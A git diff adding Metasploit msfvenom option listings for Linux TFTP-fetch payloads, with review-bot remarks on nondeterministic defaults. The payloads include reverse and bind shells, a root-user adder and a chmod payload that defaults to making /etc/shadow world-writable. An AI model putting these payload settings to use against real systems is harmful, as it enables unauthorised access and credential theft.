@@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tJhjbUTheRwd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Listen for an IPv6 connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
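Review bot: the `FETCH_FILENAME tJhjbUTheRwd` default captured in this hunk is a per-run random string, so every regeneration of these option dumps will produce a spurious diff in this file and in every sibling file in the patch; have the generator replace that value with a fixed placeholder, or state in the collection's README that the field is nondeterministic so reviewers can ignore the churn. Separately, the dumped FETCH_FILELESS description carries an unbalanced parenthesis ("(for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)"); that text comes from the module itself, so leave the capture verbatim rather than hand-editing it, but it is worth reporting upstream.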
diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..c702a31 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/x64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZTfDUDATUGf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
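Review bot: this hunk names the module "TFTP Fetch" and its description reads "Fetch and execute an x64 payload from a TFTP server", yet the captured default is `FETCH_COMMAND CURL`; please confirm the dump was taken from payload/cmd/linux/tftp/x64/shell_bind_tcp as listed and not from the http variant, or, if CURL really is the module's default, add a one-line remark in the README so readers of the tftp-named entries are not left second-guessing. The same CURL default appears in every tftp hunk in this patch, so whichever answer applies, apply it to all of them.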
diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..5d80a27 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp_random_port.txt 
@@ -0,0 +1,70 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uXsLAkBGp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_find_port.txt new file mode 100644 index 0000000..b60f2b4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_find_port.txt 
@@ -0,0 +1,73 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/tftp/x64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 91 + Rank: Normal + +Provided by: + Brendan Watters + mak + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 15617 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TzaCUbPtlaEF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
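Review bot: `CPORT 15617` in this hunk is a randomly chosen value, like FETCH_FILENAME, so this file will change on each regeneration even when nothing about the module did; pin it in the generator or flag it in the README alongside the other nondeterministic fields. While here, the option's own description ("The local client port") does not say which side of the connection "local" refers to, which matters for a find-port payload; a short clarifying sentence in the README would help users of these dumps more than the raw line does.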
diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..e4b78af --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_ipv6_tcp.txt 
@@ -0,0 +1,82 @@ + + Name: TFTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iBwfwDdwil no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..68c85d7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_tcp.txt 
@@ -0,0 +1,81 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tjIaDLTNLaKM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-adduser.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-adduser.txt new file mode 100644 index 0000000..db50d26 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-adduser.txt 
@@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Add User + Module: payload/cmd/linux/tftp/x86/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + vlad902 + spoonm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RPWXdYqfI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false 
no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-chmod.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-chmod.txt new file mode 100644 index 0000000..d684d9c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-chmod.txt 
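Review bot: in the adduser hunk above, the AppendExit option is dumped with the description "Prepend a stub that will break out of a chroot (includes setreuid to root)", which is word-for-word the PrependChrootBreak line a few entries below it and cannot be what AppendExit does; the same copied text recurs in the chmod and exec hunks that follow. Since these files are verbatim captures of `--list-options` output, do not patch the text here, but it deserves an upstream report, and the README should say that option descriptions are reproduced as-is so nobody takes this one at face value.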
@@ -0,0 +1,76 @@ + + Name: TFTP Fetch, Linux Chmod + Module: payload/cmd/linux/tftp/x86/chmod + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FILE /etc/shadow yes Filename to chmod +MODE 0666 yes File mode (octal) + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uXVuDvjo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Runs chmod on specified file with specified mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + 
PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-exec.txt new file mode 100644 index 0000000..ca50990 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-exec.txt 
@@ -0,0 +1,77 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/x86/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + vlad902 + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pxxoExvZUZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
